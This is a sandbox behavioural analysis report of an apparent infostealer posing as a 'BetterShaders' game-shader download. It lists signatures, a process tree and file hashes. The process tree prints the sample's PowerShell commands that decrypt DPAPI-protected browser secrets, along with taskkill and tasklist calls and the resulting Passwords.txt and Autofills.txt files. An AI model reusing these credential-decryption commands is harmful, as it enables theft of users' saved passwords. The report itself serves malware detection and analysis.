Analysis
max time kernel: 177s
max time network: 164s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
submitted: 27/05/2024, 14:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bettershaders.com
Resource
win10v2004-20240426-en
General
-
Target
https://bettershaders.com
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description   ioc   Process
Key value queried   \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation   7zFM.exe
Key value queried   \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation   BetterShaders.exe
Key value queried   \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation   BetterShaders.exe
-
Executes dropped EXE 11 IoCs
pid   Process
5132   7z2406-x64.exe
5612   7z2406-x64.exe
3972   7zFM.exe
4316   BetterShaders 3.8.0.exe
1420   BetterShaders.exe
2372   BetterShaders.exe
1992   BetterShaders.exe
1524   elevate.exe
2424   BetterShaders.exe
4816   BetterShaders.exe
2288   BetterShaders.exe
-
Loads dropped DLL 21 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 3 IoCs
description   ioc   Process
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"   7z2406-x64.exe
Key created   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32   7z2406-x64.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"   7z2406-x64.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow   ioc
96   ipapi.co
114   ipapi.co
95   ipapi.co
-
An obfuscated cmd.exe command-line is typically used to evade detection. 4 IoCs
pid   Process
5556   cmd.exe
5780   cmd.exe
5600   cmd.exe
396   cmd.exe
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid   Process
3944   tasklist.exe
3432   tasklist.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
description   ioc   Process
Key opened   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS   msedge.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
-
Kills process with taskkill 1 IoCs
pid   Process
4480   taskkill.exe
-
Modifies registry class 23 IoCs
-
NTFS ADS 1 IoCs
description   ioc   Process
File opened for modification   C:\Users\Admin\Downloads\Unconfirmed 906505.crdownload:SmartScreen   msedge.exe
-
Opens file in notepad (likely ransom note) 4 IoCs
pid   Process
2540   NOTEPAD.EXE
3200   NOTEPAD.EXE
2068   NOTEPAD.EXE
4512   NOTEPAD.EXE
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid   Process
3972   7zFM.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 61 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 21 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bettershaders.com
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4816
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5764
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1620
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5084
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5172
-
C:\Users\Admin\Downloads\7z2406-x64.exe"C:\Users\Admin\Downloads\7z2406-x64.exe"1⤵
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5132
-
C:\Users\Admin\Downloads\7z2406-x64.exe"C:\Users\Admin\Downloads\7z2406-x64.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5612
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4044
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\BetterShaders_3.8.0.rar"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3972 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO48F8DC98\README.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2068
-
-
C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe"C:\Users\Admin\Desktop\BetterShaders 3.8.0.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exeC:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"3⤵PID:712
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"3⤵PID:3576
-
C:\Windows\system32\taskkill.exetaskkill /IM msedge.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,8799931206630392598,803552106916620795,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1592 /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2196,i,8799931206630392598,803552106916620795,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:33⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1992
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Autofills.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4512
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\resources\elevate.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\resources\elevate.exe"1⤵
- Executes dropped EXE
PID:1524
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:2424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2464
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,13456782259732191707,11733681510408839646,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2028 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2248,i,13456782259732191707,11733681510408839646,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2288
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\Passwords.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2540
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\LICENSE.electron.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3200
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
2KB
SHA16062122660beade0e00cb86d9e2c8abc274f9f59
SHA2563e69afb533da49338f036ad2c286c4193ce6b5a2476230dc4a1140cdaf03a6fd
SHA5123127764aa594de149528b716ed135aff1e45a3fdf4a0a936b9240785812be2509f61d629c4dfae1759c87defab61e34203bf2a196381e87633d0fd02a1b76454
-
Filesize
559KB
MD54990033756bc1b2410e77a607bb62f8c
SHA1a02c0f347606bf50aa6f281e42d2d66ce6155299
SHA2563265ae5b6c16a09b1ec9ea53181de78df75e951c3ce28f33d4c483088a9ab37b
SHA5123d45c6dd30eea6d6929039c0cdaa7bb6f7b665fe67fc7a5ca79567d4fd3f907011857e5cb43c16cce9c558d4f669618bc5378f05fa583b19360df58b12b5f913
-
Filesize
577KB
MD5e7ee691a2570b917483afabe167d79d6
SHA1bfdb9a930223d2a7ca6e9c493e453990a8434a4e
SHA25610c0b55e5935764f194f9d787fcdf03a6b87df23ae4a179deb5b9ba4451b0220
SHA512034807542dfce6b2e74a4f42c2923adeea3ac930688ebb1844f9650a4f8143b807a2a30b521bd6b131062fdf8425c77cf6a521c58bf10ba81dcd4e7274134c4d
-
Filesize
1.1MB
MD586b829b3cdcf383f11ffa787a32446a0
SHA1c9f626a97bcf00541876caa7a49d23e0b84b83ef
SHA25674c62dca0b7a310aa593d1dcca8b0b0b382b052837e7cae6b87cf05b8b346b1b
SHA51272b69cc9846fb078a8c03afd60154a3b55bc828b9e13b5124a473c0ee528e3cb3ed67f67d7d763ec8e78883640c53d4c88a7a14552b851d493abf65e269353f8
-
Filesize
696KB
MD5433eee3490a1ea856768856f11abb357
SHA1f40c06dfe34cc21836c35b53310019265021abfb
SHA25630a044df9a5c665a2653a90e1a5a3868b6a16861ca945e70da1a65892f4eff44
SHA51220893e629a067c6b92cd03a1e805c6aad857388d7556e36547ebf8b51facef330ac8a0954ff7222b406655bb9254536e2857b1bfcdb27e829eaa9199fdc1189a
-
Filesize
1.2MB
MD53751919d994ad0a1b9657b947945c5a4
SHA1cdf66f0260e28076e56eedb07239e65cd195759f
SHA256d9979ea297325ae36f2a467b07d41e281f0b3a9a77373cbdf76200eaed2f48a7
SHA5128c161c5ff23cf35b6ec5c49481445d7cb978a8bafa5635d2dcdee435f73dd9bca994bdb51010223ded6c49089e5b4879ec3b4fe4a54f864fec00247c96678130
-
Filesize
538KB
MD5ee08edd61377c4d0aa6e1749ebe4cdb5
SHA1a2ce9d5f682e0b61fc2a92d42a8f90a32c6ed70c
SHA25686761c837293c3450e68905750d6888ad76cf7fea78d6468489c8ef156a444d6
SHA512cb140f6955a3291543b419241b0c16f8dd757643d40a7241cfcf8f2bb4dfcbc495e38716f0a54c773e91bc27415cf8450e954386227f3bda81434b8331cd7296
-
Filesize
581KB
MD592995b10868e466811b909c9702f1727
SHA16cd34086b876bf07dc1222cbd33e8fac60e401ae
SHA2560a62d168c0f6d9d651dedb4e01be5b533b94e8617535cd70ad22717748fbbc64
SHA512412d0f253d31eff5819fc05ed0da6284a39cd5dbc3f8dac81153511c69aef9cd3f1170d3c6a74616e3d9c51bc457045e9715456b1ef50e139f68f667d5662f53
-
Filesize
478KB
MD5fb42de6be21c78da1b05c518c5625882
SHA17d8d4e28ea196e3e48df4999d94a04c0be31de16
SHA256d9fc19e683240404a60d57037f24e1d8b20cfda4c8bcacfed577b86cd8988517
SHA51263885e8c82dbef4902c75ae7bc4c3f953057236b07d6919bf3a9f8d1e6ec0ae2cb94cbe0366e56e1272653087faf2fb07b92b18bd312e8e1b38fc76ff5eb3922
-
Filesize
527KB
MD5e25f7dcadda21b072cf012d3c23600f0
SHA1f172e6bec3cdf58260ae2b265bb2d2c2024d3c2b
SHA25653b018b82272a07929a3c4742d5217d81c49c54413010af3a9e8f3634d0ac361
SHA512fb12276e9dca5ec27bc85137872e44f5dd1451ab9bc4f87a18e279a33de8eb694c77769a58041ec2a3bf2bc8e0ff5cc42595d6aa89b6b3542d6124515502415a
-
Filesize
644KB
MD5e049505ad91c088b2bc6c11f478810f6
SHA111ccc84a0cac8b14728997eab4529e2f365e55b3
SHA256014c329d7c5d55364b4fb237ef3b117272a53f7a7e5f0d0cb7b2861942a5345c
SHA51251b983cbcad124687965afab566ce52fbab6d71b25022a377b091cc8f6b2435051fff70bf671df1d7e363ef64b80216cf64a6d05a472d55fbb3ba0ed29956bc6
-
Filesize
1.3MB
MD53c7b860c21dc86f7e62ed9033960a487
SHA147e870d1d1f758a6d8ab6da227cfdd2ea55076cd
SHA256b2658ad69c7b761cd12fead16e52bbdf1f1731b2ab96e6948f356f373ca01a76
SHA5129820633cbad79f90699c5c2813ef08d28c6c1f2e496780288a710856189686a0e1de3e27f5333e35fb3bc30a6bc81b8bfc093bb0c59cbb039c7afa8814791378
-
Filesize
544KB
MD5114ba02546a8662240b7ec23d101f47b
SHA17d6f10e25b6f4bde6659aa6d661a1139c3db539a
SHA25643086597d703d66c410d099ca76dbb2f35835b605f93fe9a98342a08cdda5c0a
SHA512d1097da68e6cdfc5cb963e6e5d18da714f3a9f3d76ad064ab9197fa8e379eff502b7b01e7b332aa1ec0ed98157537d28c2b7db8530e512e3b5b784a56d19367e
-
Filesize
583KB
MD51bab0f6c08b1cb26db455aaf581490dc
SHA13a32246b812e8ed35ddf0a6842b8bf26b19be9d3
SHA256946351ed2d74f247dea0f2742fc36d89225355480f0cec99d71599ccce3ea9e1
SHA512c6e4502fda62e2606e31a7c67679d59d21a04342c507e1fa39ac59156a4d1e1cab1923de4bcf30b735d5bcf89824d4283b57db11af9673b5b956c2f883a3bc7c
-
Filesize
582KB
MD5e4993f39d6fa671658aa3ce037aec60d
SHA12db9bfc42b07060f6e256c74a01c348cd6c2ac0a
SHA2561e6f9a40f4fa1206117063234399bd7c1e7d198cbf6c4ad633e5e18ad0929836
SHA5124192274330be238a93e370fc3fc8ada444b38fa1464889f0e3d0f6c5e548f7f7de14248937d45f8aa84c043078a69174ac1c9a5894fc9b4ff8f10deef6f77e5e
-
Filesize
1.3MB
MD59f0422326953a0c48c1db82ca2a9d639
